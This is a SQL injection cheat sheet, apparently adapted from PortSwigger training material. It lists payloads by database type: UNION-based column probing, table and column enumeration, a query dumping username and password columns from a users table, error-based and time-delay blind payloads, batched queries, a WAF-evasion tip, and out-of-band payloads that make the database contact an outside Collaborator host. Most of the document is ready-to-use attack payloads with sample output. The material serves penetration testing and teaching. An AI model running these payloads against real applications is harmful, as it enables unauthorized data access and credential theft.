Sql injection cheat sheets (can be found also here)
This SQL injection cheat sheet contains examples of useful syntax that you can use to perform a variety of tasks that often arise when performing SQL injection attacks.
- Feel free to open Issue and suggest me cheatsheets to add or fix mistakes i made
SQL injection can be detected manually by using a systematic set of tests against every entry point in the application. This typically involves:
- Submitting the single quote character
'
and looking for errors or other anomalies. - Submitting some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a different value, and looking for systematic differences in the resulting application responses.
- Submitting Boolean conditions such as
OR 1=1
andOR 1=2
, and looking for differences in the application's responses. - Submitting payloads designed to trigger time delays when executed within a SQL query, and looking for differences in the time taken to respond.
- Submitting OAST payloads designed to trigger an out-of-band network interaction when executed within a SQL query, and monitoring for any resulting interactions.
*Most SQL injection vulnerabilities arise within the WHERE
clause of a SELECT
query. This type of SQL injection is generally well-understood by experienced testers.
But SQL injection vulnerabilities can in principle occur at any location within the query, and within different query types. The most common other locations where SQL injection arises are:
- In
UPDATE
statements, within the updated values or theWHERE
clause. - In
INSERT
statements, within the inserted values. - In
SELECT
statements, within the table or column name. - In
SELECT
statements, within theORDER BY
clause.
*Sometimes server detects some 'key' words it has set and it blocks them. This means you wont get any result back, but only 500 Error. You can bypass WAF by encoding the url. Otherwords this technique is called Url encoding
Retrieving hidden data
Consider a shopping application that displays products in different categories. When the user clicks on the Gifts category, their browser requests the URL:
https://insecure-website.com/products?category=Gifts
This causes the application to make a SQL query to retrieve details of the relevant products from the database:
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
This SQL query asks the database to return:
- all details (*)
- from the products table
- where the category is Gifts
- and released is 1.
The restriction released = 1
is being used to hide products that are not released. For unreleased products, presumably released = 0
.
An attacker can construct an attack like:
https://insecure-website.com/products?category=Gifts'--
Going further,an attacker can cause the application to display all the products in any category, including categories that they don't know about:
https://insecure-website.com/products?category=Gifts'+OR+1=1--
'
'--
'OR 1=1--
& '+OR+1=1--
'OR 1=2--
& '+OR+1=2--
etc..
In UNION attacks sometimes server applies only you input #
or --
.
- Example, see the differences
' UNION SELECT NULL,NULL#
' UNION SELECT NULL,NULL--
There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:
- Retrieving hidden data, where you can modify a SQL query to return additional results.
- Subverting application logic, where you can change a query to interfere with the application's logic.
- UNION attacks, where you can retrieve data from different database tables.
- Blind SQL injection, where the results of a query you control are not returned in the application's responses.
In order to apply UNION commands with success we need to determine how many columns does the site/server uses
- See what server applies,
#
or--
// (More info here)
` UNION SELECT NULL,NULL--
- And so on you add more
NULL
to test if needed. When you find the correct number of columns you will use them with the command you want to execute. - Example, server needed 2 columns. I removed one column and replaced it with the command i want to execute.
' UNION SELECT NULL,version()--
Result:
PostgreSQL 12.15 (Ubuntu 12.15-0ubuntu0.20.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, 64-bit
IF WE RUN the following command without using the correct columns you will see that you won't get any result or you may be blocked:
' UNION SELECT version()--
You can concatenate together multiple strings to make a single string
Type | String |
---|---|
Oracle | 'foo'||'bar' |
Microsoft | 'foo'+'bar' |
PostgreSQL | 'foo'||'bar' |
MySQL | 'foo' 'bar' CONCAT('foo','bar') |
You can extract part of a string, from a specified offset with a specified length. Note that the offset index is 1-based. Each of the following expressions will return the string ba
.
Type | String |
---|---|
Oracle | SUBSTR('foobar', 4, 2) |
Microsoft | SUBSTR('foobar', 4, 2) |
PostgreSQL | SUBSTR('foobar', 4, 2) |
MySQL | SUBSTR('foobar', 4, 2) |
You can use comments to truncate a query and remove the portion of the original query that follows your input.
Type | String |
---|---|
Oracle | --comment |
Microsoft | --comment /*comment*/ |
PostgreSQL | --comment /*comment*/ |
MySQL | -- comment /*comment*/ #comment |
You can query the database to determine its type and version. This information is useful when formulating more complicated attacks.
Type | String |
---|---|
Oracle | SELECT banner FROM v$version SELECT version FROM v$instance |
Microsoft | SELECT @@version |
PostgreSQL | SELECT version() |
MySQL | SELECT @@version |
- For example, you could use a UNION attack with the following input:
' UNION SELECT @@version--
This might return output like the following, confirming that the database is Microsoft SQL Server, and the version that is being used:
Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)
Mar 18 2018 09:11:49
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build 14393: ) (Hypervisor)
You can list the tables that exist in the database, and the columns that those tables contain.
*
This Defines that you might have to add more columns in the code in order for code to work
Type | String |
---|---|
Oracle | SELECT table_name,* FROM all_tables SELECT column_name,* FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' |
Microsoft | SELECT table_name,* FROM information_schema.tables SELECT column_name,* FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
PostgreSQL | SELECT table_name,* FROM information_schema.tables SELECT column_name,* FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
MySQL | SELECT table_name,* FROM information_schema.tables SELECT column_name,* FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
With .tables
it returns output like the following:
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
=====================================================
MyDatabase dbo Products BASE TABLE
MyDatabase dbo Users BASE TABLE
MyDatabase dbo Feedback BASE TABLE
With .columns
and the table name it returns output like the following:
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME COLUMN_NAME DATA_TYPE
=================================================================
MyDatabase dbo Users UserId int
MyDatabase dbo Users Username varchar
MyDatabase dbo Users Password varchar
- Example of PostgreSQL printing tables. In the following code, server applies 2 columns. We replace one of those with table_name.
' UNION SELECT table_name,NULL FROM information_schema.tables--
- Going deeper (for PostgreSQL) we can explore the content of the table. Searching up , we will find and use an interesting table name called
users_wvtyfp
As you can see (in the following command) server accepts 2 columns thats why i added NULL
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name = 'users_wvtyfp'--
Exploting this a bit more,
' UNION SELECT username_khsgkv, password_bzvrbj FROM users_wvtyfp--
You can test a single boolean condition and trigger a database error if the condition is true.
Type | String |
---|---|
Oracle | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual |
Microsoft | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END |
PostgreSQL | 1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END) |
MySQL | SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') |
You can potentially elicit error messages that leak sensitive data returned by your malicious query.
Type | String |
---|---|
Microsoft | SELECT 'foo' WHERE 1 = (SELECT 'secret') > Conversion failed when converting the varchar value 'secret' to data type int. |
PostgreSQL | SELECT CAST((SELECT password FROM users LIMIT 1) AS int) > invalid input syntax for integer: "secret" |
MySQL | SELECT 'foo' WHERE 1=1 AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT 'secret'))) > XPATH syntax error: '\secret' |
You can use batched queries to execute multiple queries in succession. Note that while the subsequent queries are executed, the results are not returned to the application. Hence this technique is primarily of use in relation to blind vulnerabilities where you can use a second query to trigger a DNS lookup, conditional error, or time delay.
Type | String |
---|---|
Oracle | |
Microsoft | QUERY-1-HERE; QUERY-2-HERE |
PostgreSQL | QUERY-1-HERE; QUERY-2-HERE |
MySQL | QUERY-1-HERE; QUERY-2-HERE |
- Note
With MySQL, batched queries typically cannot be used for SQL injection. However, this is occasionally possible if the target application uses certain PHP or Python APIs to communicate with a MySQL database.
You can cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds.
Type | String |
---|---|
Oracle | dbms_pipe.receive_message(('a'),10) |
Microsoft | WAITFOR DELAY '0:0:10' |
PostgreSQL | SELECT pg_sleep(10) |
MySQL | SELECT SLEEP(10) |
You can test a single boolean condition and trigger a time delay if the condition is true.
Type | String |
---|---|
Oracle | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message('a',10) ELSE NULL END FROM dual |
Microsoft | IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10' |
PostgreSQL | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END |
MySQL | SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a') |
You can cause the database to perform a DNS lookup to an external domain. To do this, you will need to use Burp Collaborator to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to confirm that a DNS lookup occurred.
Type | String |
---|---|
Oracle | The following technique leverages an XML external entity XXE vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence: SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual The following technique works on fully patched Oracle installations, but requires elevated privileges: SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN') |
Microsoft | exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a' |
PostgreSQL | copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN' |
MySQL | The following techniques work on Windows only LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a') SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a' |